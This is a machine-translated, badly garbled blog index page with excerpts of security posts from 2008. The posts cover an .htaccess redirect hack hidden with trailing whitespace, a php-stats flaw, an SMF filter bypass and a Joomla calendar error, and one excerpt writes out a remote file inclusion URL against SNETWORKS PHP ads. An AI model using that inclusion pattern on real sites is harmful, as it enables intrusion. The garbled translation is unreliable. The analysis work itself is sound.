私はで述べたように、これらの日、 前のポスト 、私は悪意のあるトロイの木馬/マルウェアへのリンクを含むページを検索エンジンから来た訪問者をredirettareすることでハッキングの種類を分析する/勉強しています。
それは二つの方法でスマートな思考であることが判明として、そのシンプルさにあるファイル"。htaccessファイル"
- 。いずれかがある場合は、ユーザの介入なし "htaccessファイル"は、コードを見ていないファイルを開く場合でも、そこらで101リガによって書かれたコードを作成します。
- ただし、ファイルがすでに存在する場合は、 "htaccessを"既に存在するものを変更せず101アドインを空白尾行し、コードを提供します。 目的は、ファイルが開いた場合、ユーザーは感染の自覚を避けるために常にある。 [...]
読み続け... これらの日私は多くの人々を感染と私はよく知られている統計情報を影響を及ぼす脆弱性の数に出くわした通常のチェックをやっているハッキングの"ケース"に取り組んでいるスクリプトのphp-0.1.9.2統計 (も使用でこのブログ)。
[...]
読み続け... それが最近出版された(2008年10月4日)は、バージョン1.1.6で脆弱性が発見されたシンプルな機械フォーラムあなたは検閲ワードを記述する能力を与える投稿の内容に適用されるフィルタをバイパスすることができます(SMFまたは)、表示され、正常に機能してサイトなどのURLを指定します。
[...]
読み続け... 今日、私の仕事をして私が"インストールされているスクリプトを使用してサイトにつまずいSNETWORKS PHP広告 、それがハッキングの様々なタイプに対して脆弱であることを指摘し"。
私が分析されているサイトが原因でこのアプリケーションの代わりに使われていた場合、他の技術改ざんされていたかどうかを確認するためにいくつかの脆弱性をテストする必要がありました。 私は別の発見したが、今のために私は書く、リモートファイルのインクルードしかし、簡単にネットで探して発見され、使用する:
にhttp:// [Taget] / [パス] / config.inc.phpを?path_escape = <url includere>はしたいですか?
[...]
読み続け... 今日は、ビジネスコンポーネントで実験していたJoomlaの "と呼ばれるためのスケジュールをGoogleカレンダー(にあなたのCMSのホームページページに挿入できるようにする" Googleカレンダー )と同じイベントの管理。
私はホスティング(例えばアルバ)のいくつかはあなたがこれらのイベントのいずれかをクリックしたときにことを発見し、次のようなページを表示することによって、エラーになり、 "すぐに来る"。
Joomlaのユーザ名を忘れにイベントを表示するエラー
[...]
読み続け...
2008年10月12日
2コメント